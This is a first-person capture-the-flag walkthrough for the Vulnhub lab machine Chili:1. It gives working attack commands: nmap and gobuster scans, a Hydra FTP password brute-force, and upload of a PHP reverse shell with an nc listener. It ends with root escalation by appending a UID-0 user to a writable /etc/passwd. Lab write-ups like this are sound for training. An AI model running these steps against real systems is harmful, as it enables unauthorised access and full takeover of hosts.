Chili:1 [Vulnhub] detailed walkthrough

Madhusudan Patidar
4 min readSep 17, 2020

Hi Hackers

this is my first write-up , so please ignore some mistakes

so in this we will exploit the machine chili:1 posted by @SunCSR Team

this is the great box with some new concept of getting a foothold ,i will rate the machine as easy to medium but worthy to hack :D

so here is the brief how this goes

  1. nmap scanning
  2. ftp bruteforce
  3. finding a writable directory and getting a shell
  4. privsec using writable /etc/passwd file

so guys first setup the machine in the vmware get the ip address using netdiscover or arp-scan -l

now nmap scanning my favourite command for that is

nmap -A -sV -sC -vv $IP

nmap output showing port 21 and 80 open

now we got the ports 21 and 80 open

first thing i do is to check for anonymous login but that's not successful then i go for web enumeration i browsed the website manually i got nothing except an image of chili then i run the gobuster to enumerate for directories

gobuster dir -u http://$IP:80/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,html,sh,bak,conf -t 200

gobuster output showing two directories /index.html , /server-status

go nothing then i gonna think of steganography i downloaded the image showing at index.html

and tried tools like exiftool, steghide, stegoveritas , binwalk

got nothing then i go back to the description of the machine there is a line by author : “If you ever get stuck, try again with the name of the lab”

then i got the name chili can be username for ftp then i remembered my friend hydra

hydra -l chili -P /usr/share/wordlist/rockyou.txt -t 64 ftp://$IP

hydra output showing login succssesful for user chili

huuh! i got something to proceed with i log-in to ftp using the credentials and see that all files are shared with ftp now i am looking for flags or some interesting file but i got nothing then i browsed to /var/www/html there i found a writable directory .nano where i can upload my reverse shell

i just go the the pentestmonkey and downloaded my shell now

change the ip to my localhost address in the reverse shell and upload it through ftp

put /root/Document/shell.php /var/www/html/.nano/shell.php

now listen to your local machine with nc -lnvp 1234

and browse the shell.php file using browser , but i got internal server error 500 after some time i remember that i forgotten to give executable permission to our shell i go back to ftp and changed the permission

chmod 777 shell.php

now browsed and got my initial foothold on the machine now my first step is to upgrade my shell to tty for that

python3 -c ‘import pty; pty.spawn(“/bin/bash”)’

now there in no user flag you have to escalate privileges to get the only flag which is in the root directory

for that i copied linuxpeas to machine and run it i found that there is

/etc/passwd file is writable

output of linuxpeas

WoW peace of cake for privsec

now we have perl in the machine to generate encrypted password for that

perl -le ‘print crypt( “password”, “salt”)’

from this we will get a encrypted passwword

and then echo a user and password to /etc/passwd file

echo “fuds:Encrypted_password:0:0:User_like_root:/root:/bin/bash" >> /etc/passwd

now simply switch to root using su fuds and entering the created passwd and go to the /root directory and cat the proof.txt file for the flag

final flag

thanks for reading

thanks @SunCSR Team for creating this awesome box


